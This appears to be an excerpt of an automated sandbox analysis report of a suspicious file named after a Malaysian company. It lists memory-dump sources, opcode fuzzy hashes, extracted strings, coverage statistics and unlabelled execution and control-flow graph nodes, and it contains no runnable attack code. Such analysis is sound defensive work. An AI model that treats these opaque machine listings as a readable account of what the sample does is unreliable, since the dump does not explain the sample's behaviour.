                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction ID: 6796119d99d92555189a48d75910321fe3fe663f620ee0a250cc135dd8f3caae
                                          • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction Fuzzy Hash: 4611E176404280CFDB16DF04D9C0B16BF72FB94324F24C2A9D8090B657C33AE856CBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction ID: 33b58679b1c3e84165c5cdfbc43a3903ed4b23b0ea3a8b8b4d2e94f4adaa4a74
                                          • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction Fuzzy Hash: 8211D075504280CFCB15CF10E5C4B15FB71FB45714F24C6AAE84A4B656C33AD80ACB61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction ID: 25951fa9d78fa77afa0f221ec96f6f80a508f2355b0da02b4905787d9daa1863
                                          • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction Fuzzy Hash: FF11DD75504280DFCB12CF50D5C0B56FBB1FB84314F28C6AEE8494B696C33AD80ACB61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ffb3da2b950f20f6911c4200b045c749224a2483885cc0c328df9c4757164c0
                                          • Instruction ID: 469a6ac18296c7a71cb4fe22312f7e1e7f193f7b8dedffde63e6ff9d1d664aee
                                          • Opcode Fuzzy Hash: 8ffb3da2b950f20f6911c4200b045c749224a2483885cc0c328df9c4757164c0
                                          • Instruction Fuzzy Hash: F801A7714043549BE7104F29DD84766BBA8EF81324F28C43AED495E283D27D9840DAB2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c9f8b959b4d9a4f2ead7c90d74b66e25be8fdd5219eeef44795c81beb582108d
                                          • Instruction ID: 6db2f1202002443bfc61dc78cd262b11434722771d9862b64ba5f1f9ba0ab07e
                                          • Opcode Fuzzy Hash: c9f8b959b4d9a4f2ead7c90d74b66e25be8fdd5219eeef44795c81beb582108d
                                          • Instruction Fuzzy Hash: 0CF0C2724043449FE7208F1AD984B62FBD8EB81734F28C46AED084F283C2789840CAB1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50d3bd3b5b9f109c685c7ea671b213873dbe24e4666ff7056463ac713b2f2f30
                                          • Instruction ID: 0d91431d86e7090ed7bc54e52ddd683f674e774bf1962d6e389ea6fc726f75f9
                                          • Opcode Fuzzy Hash: 50d3bd3b5b9f109c685c7ea671b213873dbe24e4666ff7056463ac713b2f2f30
                                          • Instruction Fuzzy Hash: 76E10C74E002198FDB54DF99C590AAEFBF2FF89304F24815AD514AB35AD730A942CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e828fbd8ef1860431ca5641926edb5a31a49f979f0bc3b7f4e040b0ebbb15ee
                                          • Instruction ID: 66dc4cb444b1342637f1a9a5d0a5b8ee32b415b9234c4cc7f232db7ddfec4b01
                                          • Opcode Fuzzy Hash: 3e828fbd8ef1860431ca5641926edb5a31a49f979f0bc3b7f4e040b0ebbb15ee
                                          • Instruction Fuzzy Hash: 84E10C74E052198FDB14DFA9C580AAEFBF2FF89304F24816AD414AB35AD7319941CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8e4e50851a59a336024f00a4ec0256402aabf968c4227a9973f5379badb18cb6
                                          • Instruction ID: 0777b983d5e10f6bd7bb7233a592e2ab62ce8ccc886c4458acb680372301b37b
                                          • Opcode Fuzzy Hash: 8e4e50851a59a336024f00a4ec0256402aabf968c4227a9973f5379badb18cb6
                                          • Instruction Fuzzy Hash: 31E1DC74E002198FDB54DFA9C580AAEFBF2BF89304F24816AD414AB35AD7319941CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 20b715b81f671ef6eb4b12d61d7443ed3084b27f5e4953d0be40d4a5061808be
                                          • Instruction ID: 802791c37d92f26e3bd88627c0af83a2e6f71cf4b243fb79a89e688b138e2fe6
                                          • Opcode Fuzzy Hash: 20b715b81f671ef6eb4b12d61d7443ed3084b27f5e4953d0be40d4a5061808be
                                          • Instruction Fuzzy Hash: DAE1EA74E012198FDB54DFA9C580AAEFBF2FF89304F24816AD414AB35AD731A941CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eb9183e9d39ee51de1cf822a52a169778551b343c0fc0e33aa97705cb367027f
                                          • Instruction ID: f69f4e5ee6cb7257f6c5405551607988dec041e04f2f0de2db444edfe6fcc161
                                          • Opcode Fuzzy Hash: eb9183e9d39ee51de1cf822a52a169778551b343c0fc0e33aa97705cb367027f
                                          • Instruction Fuzzy Hash: 27E1E874E002198FDB54DFA9C580AAEFBF2BF89304F24816AD415AB35AD731AD41CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c6133a9c8cb14476b2321f4471d2031daf7683d6e2b87c6c4cdaf5e2e73af1c
                                          • Instruction ID: ea4d011e07d00a2d60a3116a85e3cde6f7d2d3194f6ee45da9bfd4bdd3c2aefb
                                          • Opcode Fuzzy Hash: 6c6133a9c8cb14476b2321f4471d2031daf7683d6e2b87c6c4cdaf5e2e73af1c
                                          • Instruction Fuzzy Hash: 76A14E32A002069FCF15DFB5C8405AEBBF2FF84300B1585BAE816AB265DB71E955CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7dca63f096b731adacee4792dfebc8c1d82f1f42ba147d08c9aa345a2bf8a0bf
                                          • Instruction ID: 3e2fa9eec54cca4f224f57b174111acce28d111277f1dc750a46e27f66952bba
                                          • Opcode Fuzzy Hash: 7dca63f096b731adacee4792dfebc8c1d82f1f42ba147d08c9aa345a2bf8a0bf
                                          • Instruction Fuzzy Hash: A4511C74E042198FDB14CFA9C9805AEFBF2BF89304F2481AAD418BB356D7309941CFA1

                                          Execution Graph

                                          Execution Coverage:17.1%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:23.4%
                                          Total number of Nodes:47
                                          Total number of Limit Nodes:9
                                          execution_graph 20255 10ae018 20256 10ae024 20255->20256 20266 6922968 20256->20266 20258 10ae0e6 20284 692fc5e 20258->20284 20288 692fc68 20258->20288 20259 10ae61f 20267 692298a 20266->20267 20268 10ae0c3 20267->20268 20292 6929548 20267->20292 20298 692992c 20267->20298 20304 6929328 20267->20304 20272 692de00 20268->20272 20276 692ddf1 20268->20276 20280 692ddff 20268->20280 20273 692de22 20272->20273 20274 6929548 2 API calls 20273->20274 20275 692deec 20273->20275 20274->20275 20275->20258 20277 692de0b 20276->20277 20278 6929548 2 API calls 20277->20278 20279 692deec 20277->20279 20278->20279 20279->20258 20281 692de22 20280->20281 20282 6929548 2 API calls 20281->20282 20283 692deec 20281->20283 20282->20283 20283->20258 20285 692fc68 20284->20285 20286 6929548 2 API calls 20285->20286 20287 692fd3a 20285->20287 20286->20287 20287->20259 20289 692fc8a 20288->20289 20290 6929548 2 API calls 20289->20290 20291 692fd3a 20289->20291 20290->20291 20291->20259 20296 6929579 20292->20296 20293 69296d9 20293->20268 20294 6929924 LdrInitializeThunk 20294->20293 20296->20293 20296->20294 20297 6929328 LdrInitializeThunk 20296->20297 20297->20296 20303 69297e3 20298->20303 20300 6929a81 20300->20268 20301 6929924 LdrInitializeThunk 20301->20300 20302 6929328 LdrInitializeThunk 20302->20303 20303->20301 20303->20302 20305 692933a 20304->20305 20307 692933f 20304->20307 20305->20268 20306 6929a69 LdrInitializeThunk 20306->20305 20307->20305 20307->20306 20308 6929c18 20309 6929c1f 20308->20309 20311 6929c25 20308->20311 20310 6929328 LdrInitializeThunk 20309->20310 20309->20311 20313 6929fa6 20309->20313 20310->20313 20312 6929328 LdrInitializeThunk 20312->20313 20313->20311 20313->20312
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$4'q$4'q$4'q
                                          • API String ID: 0-2528434116
                                          • Opcode ID: 28c16fcc2772faa3ea72243f400440eb6596a07ff35663be903d460d61ce9a79
                                          • Instruction ID: fd3604ff71d86e6f29badf15def56d29c8d181e0fb4af0d4c7892034b033bc36
                                          • Opcode Fuzzy Hash: 28c16fcc2772faa3ea72243f400440eb6596a07ff35663be903d460d61ce9a79
                                          • Instruction Fuzzy Hash: 85A2A070B00209CFCB15CFA8C594AAEBBF6BF88300F5585A9E585DB2A6D735EC41CB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 597 10a29ec-10a29f6 599 10a29f8-10a2a01 597->599 600 10a2981-10a298a 597->600 601 10a2990 599->601 602 10a2a03-10a2a0c 599->602 600->601 605 10a2997 601->605 603 10a2999 602->603 604 10a2a0e-10a2a3b 602->604 606 10a29a0-10a29c8 603->606 608 10a2a5d-10a2aac 604->608 609 10a2a3d-10a2a5c 604->609 605->603 614 10a2aae-10a2ab5 608->614 615 10a2ac7-10a2acf 608->615 616 10a2abe-10a2ac5 614->616 617 10a2ab7-10a2abc 614->617 618 10a2ad2-10a2ae6 615->618 616->618 617->618 621 10a2ae8-10a2aef 618->621 622 10a2afc-10a2b04 618->622 623 10a2af1-10a2af3 621->623 624 10a2af5-10a2afa 621->624 625 10a2b06-10a2b0a 622->625 623->625 624->625 627 10a2b6a-10a2b6d 625->627 628 10a2b0c-10a2b21 625->628 629 10a2b6f-10a2b84 627->629 630 10a2bb5-10a2bbb 627->630 628->627 636 10a2b23-10a2b26 628->636 629->630 640 10a2b86-10a2b8a 629->640 631 10a2bc1-10a2bc3 630->631 632 10a36b6 630->632 631->632 634 10a2bc9-10a2bce 631->634 637 10a36bb-10a3700 632->637 638 10a3664-10a3668 634->638 639 10a2bd4 634->639 641 10a2b28-10a2b2a 636->641 642 10a2b45-10a2b63 call 10a02c8 636->642 659 10a372e-10a3874 637->659 660 10a3702-10a3728 637->660 644 10a366a-10a366d 638->644 645 10a366f-10a36b5 638->645 639->638 646 10a2b8c-10a2b90 640->646 647 10a2b92-10a2bb0 call 10a02c8 640->647 641->642 648 10a2b2c-10a2b2f 641->648 642->627 644->637 644->645 646->630 646->647 647->630 648->627 652 10a2b31-10a2b43 648->652 652->627 652->642 662 10a38a6-10a38a9 659->662 663 10a3876-10a3878 659->663 660->659 665 10a38aa-10a38bc 662->665 663->665 666 10a387a-10a38a3 663->666 668 10a38ee-10a38f4 665->668 669 10a38be-10a38eb 665->669 666->662 671 10a3928-10a3937 668->671 672 10a38f6-10a3908 668->672 669->668 674 10a393a-10a393d 671->674 672->674 675 10a390a-10a390c 672->675 676 10a393e-10a3941 674->676 675->676 677 10a390e-10a3910 675->677 678 10a3942-10a39e8 676->678 677->678 679 10a3912-10a3927 677->679 679->671
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Xq$Xq$Xq$Xq
                                          • API String ID: 0-3965792415
                                          • Opcode ID: f2c6242aaada4b73e4c6d88aa04ac056e898e8513b9259c60174dd2cce56dd87
                                          • Instruction ID: eda1e146a0ab47d091a9a8d5feb7e12c3b294c5ebfb646ee40379ef84601f148
                                          • Opcode Fuzzy Hash: f2c6242aaada4b73e4c6d88aa04ac056e898e8513b9259c60174dd2cce56dd87
                                          • Instruction Fuzzy Hash: 0B02D131A0C7D58FDBA78FB884612EABFB0AF0B314B5898EDC4C55E517C6354852EB42

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 680 10a6fc8-10a6ffe 681 10a7006-10a700c 680->681 813 10a7000 call 10a7118 680->813 814 10a7000 call 10a6fc8 680->814 815 10a7000 call 10a69a0 680->815 682 10a700e-10a7012 681->682 683 10a705c-10a7060 681->683 684 10a7021-10a7028 682->684 685 10a7014-10a7019 682->685 686 10a7062-10a7071 683->686 687 10a7077-10a708b 683->687 688 10a70fe-10a713b 684->688 689 10a702e-10a7035 684->689 685->684 690 10a709d-10a70a7 686->690 691 10a7073-10a7075 686->691 692 10a7093-10a709a 687->692 810 10a708d call 10aa0e8 687->810 811 10a708d call 10a9dd0 687->811 812 10a708d call 10a9de0 687->812 701 10a713d-10a7143 688->701 702 10a7146-10a7166 688->702 689->683 693 10a7037-10a703b 689->693 694 10a70a9-10a70af 690->694 695 10a70b1-10a70b5 690->695 691->692 699 10a704a-10a7051 693->699 700 10a703d-10a7042 693->700 697 10a70bd-10a70f7 694->697 695->697 698 10a70b7 695->698 697->688 698->697 699->688 703 10a7057-10a705a 699->703 700->699 701->702 708 10a7168 702->708 709 10a716d-10a7174 702->709 703->692 711 10a74fc-10a7505 708->711 712 10a7176-10a7181 709->712 713 10a750d-10a7519 712->713 714 10a7187-10a719a 712->714 721 10a751b-10a7521 713->721 722 10a7525 713->722 719 10a719c-10a71aa 714->719 720 10a71b0-10a71cb 714->720 719->720 731 10a7484-10a748b 719->731 729 10a71ef-10a71f2 720->729 730 10a71cd-10a71d3 720->730 725 10a752d-10a752f 721->725 726 10a7523 721->726 723 10a7531-10a7536 722->723 724 10a7527 722->724 724->725 725->723 726->722 735 10a71f8-10a71fb 729->735 736 10a734c-10a7352 729->736 732 10a71dc-10a71df 730->732 733 10a71d5 730->733 731->711 734 10a748d-10a748f 731->734 738 10a7212-10a7218 732->738 739 10a71e1-10a71e4 732->739 733->732 733->736 737 10a743e-10a7441 733->737 733->738 740 10a749e-10a74a4 734->740 741 10a7491-10a7496 734->741 735->736 743 10a7201-10a7207 735->743 736->737 742 10a7358-10a735d 736->742 748 10a7508 737->748 749 10a7447-10a744d 737->749 750 10a721a-10a721c 738->750 751 10a721e-10a7220 738->751 744 10a71ea 739->744 745 10a727e-10a7284 739->745 740->713 746 10a74a6-10a74ab 740->746 741->740 742->737 743->736 747 10a720d 743->747 744->737 745->737 754 10a728a-10a7290 745->754 752 10a74ad-10a74b2 746->752 753 10a74f0-10a74f3 746->753 747->737 748->713 755 10a744f-10a7457 749->755 756 10a7472-10a7476 749->756 757 10a722a-10a7233 750->757 751->757 752->748 762 10a74b4 752->762 753->748 761 10a74f5-10a74fa 753->761 763 10a7292-10a7294 754->763 764 10a7296-10a7298 754->764 755->713 765 10a745d-10a746c 755->765 756->731 760 10a7478-10a747e 756->760 758 10a7246-10a726e 757->758 759 10a7235-10a7240 757->759 785 10a7362-10a7398 758->785 786 10a7274-10a7279 758->786 759->737 759->758 760->712 760->731 761->711 761->734 766 10a74bb-10a74c0 762->766 767 10a72a2-10a72b9 763->767 764->767 765->720 765->756 771 10a74e2-10a74e4 766->771 772 10a74c2-10a74c4 766->772 778 10a72bb-10a72d4 767->778 779 10a72e4-10a730b 767->779 771->748 774 10a74e6-10a74e9 771->774 775 10a74d3-10a74d9 772->775 776 10a74c6-10a74cb 772->776 774->753 775->713 777 10a74db-10a74e0 775->777 776->775 777->771 781 10a74b6-10a74b9 777->781 778->785 789 10a72da-10a72df 778->789 779->748 791 10a7311-10a7314 779->791 781->748 781->766 792 10a739a-10a739e 785->792 793 10a73a5-10a73ad 785->793 786->785 789->785 791->748 794 10a731a-10a7343 791->794 795 10a73bd-10a73c1 792->795 796 10a73a0-10a73a3 792->796 793->748 797 10a73b3-10a73b8 793->797 794->785 809 10a7345-10a734a 794->809 799 10a73c3-10a73c9 795->799 800 10a73e0-10a73e4 795->800 796->793 796->795 797->737 799->800 801 10a73cb-10a73d3 799->801 802 10a73ee-10a740d call 10a76f1 800->802 803 10a73e6-10a73ec 800->803 801->748 805 10a73d9-10a73de 801->805 806 10a7413-10a7417 802->806 803->802 803->806 805->737 806->737 807 10a7419-10a7435 806->807 807->737 809->785 810->692 811->692 812->692 813->681 814->681 815->681
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$(oq$,q$,q
                                          • API String ID: 0-620556200
                                          • Opcode ID: 0c6732cb9a9edbe172bf5a03ea7bf8f7d20731b8b4571aa935f4fb26b2f6fe93
                                          • Instruction ID: 978a511b4ae91bc43bbf29ba82996939a94a72c25413137541a49e23ada5fb60
                                          • Opcode Fuzzy Hash: 0c6732cb9a9edbe172bf5a03ea7bf8f7d20731b8b4571aa935f4fb26b2f6fe93
                                          • Instruction Fuzzy Hash: C0026271A00219DFDB55CFA8C884AADBBF2BF88300F95C0A9E9859B261D736DC41CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$Hq
                                          • API String ID: 0-2917151738
                                          • Opcode ID: fa8d41b7b8c9129cbe3abfd989483635b22d399a78686db93af1e53b22b4d96a
                                          • Instruction ID: 5f1f1074fa2b80b59ebd993286fc43bc26fe285b9701426adb5e0e7ff3f36de3
                                          • Opcode Fuzzy Hash: fa8d41b7b8c9129cbe3abfd989483635b22d399a78686db93af1e53b22b4d96a
                                          • Instruction Fuzzy Hash: 8B12AF70A002198FDB15DFA9C854BAEBBF6BF88340F588169E486DB395DB359D41CF80

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2138 10a3e09-10a3e25 2139 10a3e2e-10a3e3e 2138->2139 2140 10a3e27-10a3e29 2138->2140 2142 10a3e40 2139->2142 2143 10a3e45-10a3e55 2139->2143 2141 10a40cc-10a40d3 2140->2141 2142->2141 2145 10a3e5b-10a3e69 2143->2145 2146 10a40b3-10a40c1 2143->2146 2150 10a40d4-10a4152 2145->2150 2151 10a3e6f 2145->2151 2149 10a40c3-10a40c7 call 10a02c8 2146->2149 2146->2150 2149->2141 2151->2150 2153 10a400e-10a4034 2151->2153 2154 10a3f4c-10a3f6d 2151->2154 2155 10a3fcc-10a4009 2151->2155 2156 10a3e8d-10a3eae 2151->2156 2157 10a3f00-10a3f21 2151->2157 2158 10a3f26-10a3f47 2151->2158 2159 10a4067-10a4082 call 10a02d8 2151->2159 2160 10a40a7-10a40b1 2151->2160 2161 10a4084-10a40a5 call 10a28f0 2151->2161 2162 10a3eda-10a3efb 2151->2162 2163 10a4039-10a4065 2151->2163 2164 10a3f9f-10a3fc7 2151->2164 2165 10a3f72-10a3f9a 2151->2165 2166 10a3eb3-10a3ed5 2151->2166 2167 10a3e76-10a3e88 2151->2167 2153->2141 2154->2141 2155->2141 2156->2141 2157->2141 2158->2141 2159->2141 2160->2141 2161->2141 2162->2141 2163->2141 2164->2141 2165->2141 2166->2141 2167->2141
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Xq$$q
                                          • API String ID: 0-855381642
                                          • Opcode ID: 858dac554363508e470bfa08be614fc91ac0009ea22ee462c24c949de2c6a63a
                                          • Instruction ID: b7947322625d7e2bfff06dbba47b03efdcadd9ed9b91cb0036817a3c7786bdc6
                                          • Opcode Fuzzy Hash: 858dac554363508e470bfa08be614fc91ac0009ea22ee462c24c949de2c6a63a
                                          • Instruction Fuzzy Hash: 9E91A534B44219DFDB18DBB4845467E7BA7BFC8300B59862DE482EB388CE799C029791

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2387 10ac146-10ac158 2388 10ac15a-10ac16a 2387->2388 2389 10ac184 2387->2389 2392 10ac16c 2388->2392 2390 10ac186-10ac18a 2389->2390 2393 10ac170-10ac172 2392->2393 2394 10ac17b-10ac17e 2393->2394 2395 10ac174-10ac179 2393->2395 2396 10ac18b-10ac199 2394->2396 2397 10ac180-10ac182 2394->2397 2395->2390 2396->2392 2399 10ac19b-10ac19d 2396->2399 2397->2388 2397->2389 2399->2393 2400 10ac19f-10ac1a1 2399->2400 2400->2395 2401 10ac1a3-10ac1c8 2400->2401 2402 10ac1ca 2401->2402 2403 10ac1cf-10ac2ac call 10a41a0 call 10a3cc0 2401->2403 2402->2403 2413 10ac2ae 2403->2413 2414 10ac2b3-10ac2d4 call 10a5658 2403->2414 2413->2414 2416 10ac2d9-10ac2e4 2414->2416 2417 10ac2eb-10ac2ef 2416->2417 2418 10ac2e6 2416->2418 2419 10ac2f1-10ac2f2 2417->2419 2420 10ac2f4-10ac2fb 2417->2420 2418->2417 2421 10ac313-10ac357 2419->2421 2422 10ac2fd 2420->2422 2423 10ac302-10ac310 2420->2423 2427 10ac3bd-10ac3d4 2421->2427 2422->2423 2423->2421 2429 10ac359-10ac36f 2427->2429 2430 10ac3d6-10ac3fb 2427->2430 2434 10ac399 2429->2434 2435 10ac371-10ac37d 2429->2435 2436 10ac3fd-10ac412 2430->2436 2437 10ac413 2430->2437 2440 10ac39f-10ac3bc 2434->2440 2438 10ac37f-10ac385 2435->2438 2439 10ac387-10ac38d 2435->2439 2436->2437 2441 10ac397 2438->2441 2439->2441 2440->2427 2441->2440
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: d9472439bc6c1bbdec06784f52a6d5c1ba15176531ad06b2444c437e7e1f45e2
                                          • Instruction ID: 6571315e91ad21b527b5cc4daefd94f7d18132503a071da0ab44c4c9ccb47461
                                          • Opcode Fuzzy Hash: d9472439bc6c1bbdec06784f52a6d5c1ba15176531ad06b2444c437e7e1f45e2
                                          • Instruction Fuzzy Hash: 55A10575E00218DFEB54CFA9D984A9DBBF2BF89300F5580AAE449EB365DB309941CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2445 10ac468-10ac471 2446 10ac473-10ac498 2445->2446 2447 10ac444-10ac45e 2445->2447 2448 10ac49a 2446->2448 2449 10ac49f-10ac57c call 10a41a0 call 10a3cc0 2446->2449 2448->2449 2462 10ac57e 2449->2462 2463 10ac583-10ac5a4 call 10a5658 2449->2463 2462->2463 2465 10ac5a9-10ac5b4 2463->2465 2466 10ac5bb-10ac5bf 2465->2466 2467 10ac5b6 2465->2467 2468 10ac5c1-10ac5c2 2466->2468 2469 10ac5c4-10ac5cb 2466->2469 2467->2466 2470 10ac5e3-10ac627 2468->2470 2471 10ac5cd 2469->2471 2472 10ac5d2-10ac5e0 2469->2472 2476 10ac68d-10ac6a4 2470->2476 2471->2472 2472->2470 2478 10ac629-10ac63f 2476->2478 2479 10ac6a6-10ac6cb 2476->2479 2483 10ac669 2478->2483 2484 10ac641-10ac64d 2478->2484 2485 10ac6cd-10ac6e2 2479->2485 2486 10ac6e3 2479->2486 2489 10ac66f-10ac68c 2483->2489 2487 10ac64f-10ac655 2484->2487 2488 10ac657-10ac65d 2484->2488 2485->2486 2490 10ac667 2487->2490 2488->2490 2489->2476 2490->2489
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 18339a30343474af226c88c628777af6a124a13b0d08c815be850463531d2efb
                                          • Instruction ID: 6e07b239900d0a76d1c16314b64f8f3415a3c783699c5c882b2449340212375a
                                          • Opcode Fuzzy Hash: 18339a30343474af226c88c628777af6a124a13b0d08c815be850463531d2efb
                                          • Instruction Fuzzy Hash: 0091C574E00218CFEB54DFAAD984B9DBBF2BF88300F558069E459AB365DB349941CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
